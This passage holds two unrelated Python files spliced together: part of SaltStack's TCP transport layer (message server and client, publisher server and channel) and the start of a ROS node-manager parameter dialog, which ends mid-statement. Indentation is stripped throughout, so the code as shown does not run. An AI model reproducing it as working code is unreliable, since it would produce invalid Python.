super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, header, framed_msg["body"]
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super().__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@salt.ext.tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
yield futures
raise salt.ext.tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = salt.ext.tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
self.backoff = opts.get("tcp_reconnect_backoff", 1)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "_stream") and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (
self.io_loop
!= salt.ext.tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()
):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop(),
)
self.io_loop.start()
except Exception as e: # pylint: disable=broad-except
log.info("Exception caught in SaltMessageClient.close: %s", str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
"""
Ask for this client to reconnect to the origin
"""
if hasattr(self, "_connecting_future") and not self._connecting_future.done():
future = self._connecting_future
else:
future = salt.ext.tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
@salt.ext.tornado.gen.coroutine
def _connect(self):
"""
Try to connect for the rest of time!
"""
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if salt.ext.tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
else:
log.warning(
"If you need a certain source IP/port, consider upgrading"
" Tornado >= 4.5"
)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
self._connecting_future.set_result(True)
break
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to"
" %s:%s: %r, will reconnect in %d seconds",
self.host,
self.port,
exc,
self.backoff,
)
yield salt.ext.tornado.gen.sleep(self.backoff)
# self._connecting_future.set_exception(exc)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(
4096, partial=True
)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not"
" tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@salt.ext.tornado.gen.coroutine
def _stream_send(self):
while (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except salt.ext.tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id, msg):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
future = self.send_future_map.pop(message_id)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
msg,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(self, msg, timeout=None, callback=None, raw=False, future=None, tries=3):
"""
Send given message, and return a future
"""
message_id = self._message_id()
header = {"mid": message_id}
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message_id, msg
)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append(
(message_id, salt.transport.frame.frame_msg(msg, header=header))
)
return future
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(self, opts, io_loop=None):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.event = None
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
"master", opts=self.opts, listen=False
)
else:
self.event = None
def close(self):
if self._closing:
return
self._closing = True
if self.event is not None:
self.event.destroy()
self.event = None
if self.aes_funcs is not None:
self.aes_funcs.destroy()
self.aes_funcs = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {"new": [id_], "lost": []}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {"new": [], "lost": [id_]}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if body["enc"] != "aes":
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
load = crypticle.loads(body["load"])
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load["id"], load["tok"]):
continue
client.id_ = load["id"]
self._add_client_present(client)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.trace("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug("TCP PubServer sending payload: %s", package)
payload = salt.transport.frame.frame_msg(package["payload"])
to_remove = []
if "topic_lst" in package:
topic_lst = package["topic_lst"]
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug("Publish target %s not connected", topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state["secrets"]
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts, "secrets": salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
"""
Publish "load" to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
# Use the Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
# TODO: switch to the actual asynchronous interface
# pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,),
loop_kwarg="io_loop",
)
pub_sock.connect()
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list" and not self.opts.get("order_masters", False):
if isinstance(load["tgt"], str):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(
load["tgt"], tgt_type=load["tgt_type"]
)
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload["topic_lst"] = match_ids
else:
int_payload["topic_lst"] = load["tgt"]
# Send it over IPC!
pub_sock.send(int_payload)
|
parameter_dialog.py
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, absolute_import, print_function
# unicode_literals are not included to avoid problems with publish to ROS topics
from python_qt_binding.QtCore import Qt, Signal, QPoint, QSize
from python_qt_binding.QtGui import QBrush, QColor, QIcon, QPalette
from xmlrpclib import Binary
import os
import roslib.msgs
import roslib.names
import rospy
import ruamel.yaml
import sys
import threading
import traceback
from fkie_node_manager_daemon.common import utf8
from fkie_node_manager.detailed_msg_box import MessageBox
from fkie_node_manager.editor.line_edit import EnhancedLineEdit
from fkie_node_manager.parameter_handler import ParameterHandler
import fkie_node_manager as nm
try:
from python_qt_binding.QtGui import QApplication, QComboBox, QCheckBox, QLineEdit, QScrollArea, QWidget
from python_qt_binding.QtGui import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtGui import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
except Exception:
from python_qt_binding.QtWidgets import QApplication, QComboBox, QCheckBox, QLineEdit, QScrollArea, QWidget
from python_qt_binding.QtWidgets import QFormLayout, QHBoxLayout, QVBoxLayout, QSpacerItem, QSizePolicy
from python_qt_binding.QtWidgets import QFrame, QDialog, QDialogButtonBox, QFileDialog, QLabel, QPushButton, QTextEdit
def str2bool(val):
return val.lower() in ("yes", "true", "t", "1")
class MyComboBox(QComboBox):
'''
Supports the remove of items by pressing Shift+Delete.
'''
remove_item_signal = Signal(str)
def __init__(self, parent=None):
QComboBox.__init__(self, parent=parent)
def keyPressEvent(self, event):
key_mod = QApplication.keyboardModifiers()
if key_mod & Qt.ShiftModifier and (event.key() == Qt.Key_Delete):
try:
curr_text = self.currentText()
if curr_text:
for i in range(self.count()):
if curr_text == self.itemText(i):
self.removeItem(i)
self.remove_item_signal.emit(curr_text)
self.clearEditText()
except Exception:
print(traceback.format_exc(1))
QComboBox.keyPressEvent(self, event)
class ValueWidget(QWidget):
'''
'''
def __init__(self, parameter_description, parent=None):
QWidget.__init__(self, parent=parent)
self.parameter_description = parameter_description
self._value_widget = None
self.warn_label = QLabel(parent=self)
self.help_label = QLabel(parameter_description.hint, parent=self)
vw = QWidget(self)
hlayout = QHBoxLayout(vw)
hlayout.setContentsMargins(0, 0, 0, 0)
hlayout.addWidget(self._create_input_widget())
if parameter_description.hint:
# add help button if hint is available
self.help_button = QPushButton(QIcon(':/icons/info.png'), '')
self.help_button.setFlat(True)
self.help_button.setMaximumSize(20, 20)
self.help_button.setCheckable(True)
self.help_button.toggled.connect(self._on_help_toggled)
hlayout.addWidget(self.help_button)
vlayout = QVBoxLayout(self)
vlayout.setContentsMargins(0, 0, 0, 0)
vlayout.setSpacing(1)
vlayout.addWidget(vw)
# add label to show warnings on wrong input value
self.warn_label.setWordWrap(True)
vlayout.addWidget(self.warn_label)
self.warn_label.setVisible(False)
self.warn_label.setStyleSheet("QLabel { color: %s;}" % QColor(255, 83, 13).name())
# help label
self.help_label.setWordWrap(True)
self.help_label.setStyleSheet("QLabel { background: %s;}" % QColor(255, 255, 235).name())
vlayout.addWidget(self.help_label)
self.help_label.setVisible(False)
def current_text(self):
result = ''
if isinstance(self._value_widget, QCheckBox):
result = repr(self._value_widget.isChecked())
elif isinstance(self._value_widget, MyComboBox):
result = self._value_widget.currentText()
elif isinstance(self._value_widget, QLineEdit):
result = self._value_widget.text()
elif isinstance(self._value_widget, QLabel):
result = self._value_widget.text()
return result
def set_value(self, value):
if isinstance(self._value_widget, QCheckBox):
bval = value
if not isinstance(value, bool):
bval = str2bool(value[0] if isinstance(value, list) else value)
self._value_widget.setChecked(bval)
elif isinstance(self._value_widget, MyComboBox):
self._value_widget.setEditText(', '.join([utf8(v) for v in value]) if isinstance(value, list) else utf8(value))
elif isinstance(self._value_widget, QLabel):
self._value_widget.setText(value)
elif isinstance(self._value_widget, QLineEdit):
# avoid ' or " that escapes the string values
self._value_widget.setText(', '.join([utf8(v) for v in value]) if isinstance(value, list) else utf8(value))
def add_cached_values(self):
if isinstance(self._value_widget, MyComboBox):
fullname = self.parameter_description.fullName()
values = nm.history().cachedParamValues(fullname)
for i in range(self._value_widget.count()):
try:
values.remove(self._value_widget.itemText(i))
except ValueError:
pass
except Exception:
print(traceback.format_exc())
if self._value_widget.count() == 0:
values.insert(0, '')
self._value_widget.addItems(values)
def _create_input_widget(self):
pd = self.parameter_description
value = pd._value
if 'bool' in pd.baseType():
# add checkbox to edit boolean value
cb = QCheckBox(parent=self)
cb.setObjectName(pd.name())
if not isinstance(value, bool):
value = str2bool(value[0] if isinstance(value, list) else value)
pd._value_org = value
cb.setChecked(value)
cb.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
cb.setMinimumHeight(20)
self._value_widget = cb
return cb
elif pd.read_only:
# read only value are added as label
label = QLabel(value, parent=self)
label.setMinimumHeight(20)
label.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
self._value_widget = label
return label
else:
# all other are added as combobox
cb = MyComboBox(parent=self)
cb.setObjectName(pd.name())
cb.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed))
cb.setEditable(True)
cb.remove_item_signal.connect(pd.removeCachedValue)
cb.editTextChanged.connect(self._check_text)
items = []
if isinstance(value, list):
if pd.isArrayType():
items.append(','.join([utf8(val) for val in value]))
else:
items[len(items):] = value
else:
if value is not None and value:
items.append(utf8(value) if not isinstance(value, Binary) else '{binary data!!! updates will be ignored!!!}')
elif pd.isTimeType():
items.append('now')
if ':alt' in pd._tags:
# add alternative values
try:
for alt_value in pd._tags[':alt']:
if alt_value not in items:
items.append(alt_value)
except Exception as err:
rospy.logwarn('Can not add alternative values to %s: %s' % (pd.name(), utf8(err)))
pd._value_org = items[0] if items else ''
cb.addItems(items)
self._value_widget = cb
if pd.path_type:
# add path editor if path type is defined
fd = QWidget(self)
hlayout = QHBoxLayout(fd)
hlayout.setContentsMargins(0, 0, 0, 0)
hlayout.addWidget(cb)
self.path_button = QPushButton('...')
self.path_button.setFlat(True)
self.path_button.setMaximumSize(20, 20)
self.path_button.clicked.connect(self._on_file_dialog_clicked)
hlayout.addWidget(self.path_button)
return fd
else:
return cb
def _check_text(self, text=''):
'''
Checks the content of the combobox for valid type
'''
try:
self.parameter_description.updateValue(text)
# self.combobox.setStyleSheet('')
self.warn_label.setVisible(False)
except Exception as err:
self.warn_label.setText(utf8(err))
# bg_style = "MyComboBox { background: %s;}" % QColor(255, 83, 13).name()
# self.combobox.setStyleSheet("%s" % (bg_style))
self.warn_label.setVisible(True)
def _on_file_dialog_clicked(self):
# Workaround for QFileDialog.getExistingDirectory because it do not
# select the configuration folder in the dialog
self.dialog = QFileDialog(self, caption=self.parameter_description.hint)
self.dialog.setOption(QFileDialog.HideNameFilterDetails, True)
if self.parameter_description.path_type == 'dir':
self.dialog.setFileMode(QFileDialog.Directory)
self.dialog.setDirectory(self._value_widget.currentText())
if self.dialog.exec_():
fileNames = self.dialog.selectedFiles()
self._value_widget.setEditText(fileNames[0])
def _on_help_toggled(self, checked):
self.help_label.setVisible(checked)
class ParameterDescription(object):
'''
Used for internal representation of the parameter in dialog.
'''
def __init__(self, name, msg_type, value=None, widget=None):
self._name = str(name)
self._type = msg_type
self._value = None
self._value_org = None
self.read_only = False
self.path_type = ''
self.hint = ''
self._min = None
self._max = None
self._tags = {}
self._read_value(value)
self._widget = widget
try:
